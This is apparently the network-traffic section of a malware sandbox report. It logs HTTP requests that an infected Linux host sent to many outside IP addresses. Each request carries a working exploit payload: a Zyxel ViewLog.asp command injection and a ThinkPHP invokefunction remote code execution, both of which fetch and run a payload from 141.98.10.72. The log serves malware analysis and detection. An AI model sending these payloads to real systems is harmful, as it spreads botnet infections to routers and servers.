                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1041192.168.2.235023094.121.148.1458080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.787132025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1042192.168.2.235063685.122.223.2438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.868927956 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1043192.168.2.233693694.130.54.148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.955863953 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.165278912 CET88INHTTP/1.0 400 Bad Request
                                                            Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                            Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1044192.168.2.234751095.238.195.1728080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.992197037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.233866930 CET142INHTTP/1.1 401 Unauthorized
                                                            WWW-Authenticate: Basic realm="1.41.0.0 - 5410ECDC5C59"
                                                            Connection: close
                                                            Data Raw: 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 0d 0a
                                                            Data Ascii: 401 Unauthorized: Password required


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1045192.168.2.236059494.122.228.2078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.030868053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1046192.168.2.234731094.120.228.1868080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.032593966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1047192.168.2.234247294.123.20.368080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.032769918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1048192.168.2.234832694.120.55.1158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.034581900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1049192.168.2.234689095.0.231.2068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.045229912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:21.359579086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:22.895406008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:26.094893932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:32.238173962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:44.524379015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:10.632776976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1050192.168.2.235301285.95.156.2028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.323540926 CET334INHTTP/1.0 400 Bad Request
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:30:20 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1051192.168.2.235281262.202.154.2058080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.764585972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.815115929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1052192.168.2.233506285.118.95.408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.801175117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:21.038567066 CET30INHTTP/1.1 404 Can't find file


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1053192.168.2.234172494.123.123.208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.808188915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1054192.168.2.234211294.123.109.538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:20.809227943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1055192.168.2.235809694.121.184.288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.281429052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1056192.168.2.235732488.99.58.23880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.563970089 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:21.773581028 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1057192.168.2.235308888.81.149.18380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.575551987 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:21.805422068 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1058192.168.2.233565288.93.162.4280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.598092079 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1059192.168.2.234918895.131.137.24280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.766585112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:21.969084978 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
